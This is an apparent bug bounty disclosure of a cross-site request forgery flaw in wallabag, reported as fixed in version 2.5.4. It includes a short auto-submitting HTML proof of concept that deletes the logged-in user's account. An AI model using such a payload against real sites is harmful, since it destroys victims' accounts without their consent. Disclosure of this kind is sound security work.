CSRF leading to delete account in wallabag/wallabag
Jan 4th 2023
wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via
Proof of Concept
- Create a new user.
- Login as the new user.
- Open the following HTML file in the browser.
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/account/delete"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of tricking a user to delete their own account.
Jérémy Benoist validated this vulnerability a month ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jérémy Benoist marked this as fixed in 2.5.4 with commit 268372 a month ago
This vulnerability has been assigned a CVE
A wallabag/wallabag maintainer gave praise a month ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation